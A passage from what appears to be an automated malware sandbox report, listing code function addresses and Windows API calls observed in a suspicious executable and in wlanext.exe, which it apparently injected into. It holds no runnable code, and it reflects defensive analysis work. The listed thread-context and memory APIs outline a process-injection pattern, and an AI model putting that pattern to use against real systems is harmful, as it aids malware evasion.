          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CAD30 NtSetContextThread | 9_2_030CAD30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9560 NtWriteFile | 9_2_030C9560
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C95F0 NtQueryInformationFile | 9_2_030C95F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008681D0 NtCreateFile | 9_2_008681D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00868280 NtReadFile | 9_2_00868280
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008683B0 NtAllocateVirtualMemory | 9_2_008683B0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00868300 NtClose | 9_2_00868300
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008681CA NtCreateFile | 9_2_008681CA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008682FA NtClose | 9_2_008682FA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086827A NtReadFile | 9_2_0086827A
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess | 1_2_00403166
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004046C3 | 1_2_004046C3
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004060D9 | 1_2_004060D9
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004068B0 | 1_2_004068B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B869 | 3_2_0041B869
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041C07B | 3_2_0041C07B
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041C804 | 3_2_0041C804
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00401030 | 3_2_00401030
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00401174 | 3_2_00401174
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B985 | 3_2_0041B985
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CB98 | 3_2_0041CB98
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00408C6B | 3_2_00408C6B
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00408C70 | 3_2_00408C70
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00408C2B | 3_2_00408C2B
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B4B3 | 3_2_0041B4B3
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041C58E | 3_2_0041C58E
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00402D90 | 3_2_00402D90
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041BE99 | 3_2_0041BE99
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CF43 | 3_2_0041CF43
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CF0C | 3_2_0041CF0C
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041BFD4 | 3_2_0041BFD4
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CFA2 | 3_2_0041CFA2
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00402FB0 | 3_2_00402FB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0 | 3_2_00A920A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B320A8 | 3_2_00B320A8
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7B090 | 3_2_00A7B090
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B21002 | 3_2_00B21002
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120 | 3_2_00A84120
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6F900 | 3_2_00A6F900
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9EBB0 | 3_2_00A9EBB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7841F | 3_2_00A7841F
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A92581 | 3_2_00A92581
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7D5E0 | 3_2_00A7D5E0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A60D20 | 3_2_00A60D20
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B31D55 | 3_2_00B31D55
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A86E30 | 3_2_00A86E30
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041B869 | 3_1_0041B869
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041C07B | 3_1_0041C07B
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041C804 | 3_1_0041C804
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00401030 | 3_1_00401030
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00401174 | 3_1_00401174
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041B985 | 3_1_0041B985
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041CB98 | 3_1_0041CB98
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03152B28 | 9_2_03152B28
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030BEBB0 | 9_2_030BEBB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0314DBD2 | 9_2_0314DBD2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031403DA | 9_2_031403DA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031522AE | 9_2_031522AE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0308F900 | 9_2_0308F900
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030A4120 | 9_2_030A4120
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03141002 | 9_2_03141002
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0315E824 | 9_2_0315E824
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0309B090 | 9_2_0309B090
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030B20A0 | 9_2_030B20A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031520A8 | 9_2_031520A8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031528EC | 9_2_031528EC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0315DFCE | 9_2_0315DFCE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03151FF1 | 9_2_03151FF1
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0314D616 | 9_2_0314D616
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030A6E30 | 9_2_030A6E30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03152EF7 | 9_2_03152EF7
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03152D07 | 9_2_03152D07
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03080D20 | 9_2_03080D20
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03151D55 | 9_2_03151D55
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030B2581 | 9_2_030B2581
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031525DD | 9_2_031525DD
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0309D5E0 | 9_2_0309D5E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0309841F | 9_2_0309841F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0314D466 | 9_2_0314D466
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086C804 | 9_2_0086C804
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086CB98 | 9_2_0086CB98
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00858C2B | 9_2_00858C2B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00858C6B | 9_2_00858C6B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00858C70 | 9_2_00858C70
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086C58E | 9_2_0086C58E
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00852D90 | 9_2_00852D90
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086CFA0 | 9_2_0086CFA0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00852FB0